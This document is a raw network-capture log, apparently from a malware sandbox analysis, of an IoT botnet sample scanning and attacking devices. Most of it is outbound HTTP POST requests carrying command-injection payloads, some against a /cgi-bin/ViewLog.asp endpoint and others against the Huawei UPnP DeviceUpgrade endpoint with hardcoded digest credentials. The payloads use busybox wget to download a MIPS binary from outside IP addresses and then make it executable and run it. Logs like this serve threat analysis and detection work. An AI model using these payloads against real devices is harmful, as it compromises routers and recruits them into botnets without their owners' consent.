                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.284791946 CET254INHTTP/1.1 400 Bad Request
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 16
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.309616089 CET254INHTTP/1.1 400 Bad Request
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 16
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.332062960 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.356251955 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.379204035 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.402483940 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.425435066 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.448724031 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.471453905 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html
                                              Nov 23, 2023 05:18:05.501147032 CET261INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/html


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              670192.168.2.144963631.145.173.2018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.032136917 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              671192.168.2.143946095.174.109.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.497519970 CET255INHTTP/1.1 400 Bad Request
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 16
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.522994041 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.558403969 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.563097000 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.586472034 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.609033108 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.633097887 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.665235043 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.679102898 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.702438116 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain
                                              Nov 23, 2023 05:18:05.725203037 CET262INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon Feb 28 13:44:14 2005
                                              Server: 3S_WebServer
                                              Last-modified: Mon Feb 28 13:44:14 2005
                                              Cache-Control: must-revalidate
                                              Content-length: 23
                                              Content-type: text/plain


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              672192.168.2.143700694.83.225.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:06.251921892 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              673192.168.2.145014041.42.86.21637215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:06.959995985 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:07.247066021 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              674192.168.2.145190641.239.35.5837215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.363085985 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:09.697202921 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:10.052370071 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              675192.168.2.1456464156.241.85.3237215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.516351938 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:12.609074116 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:18.752816916 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
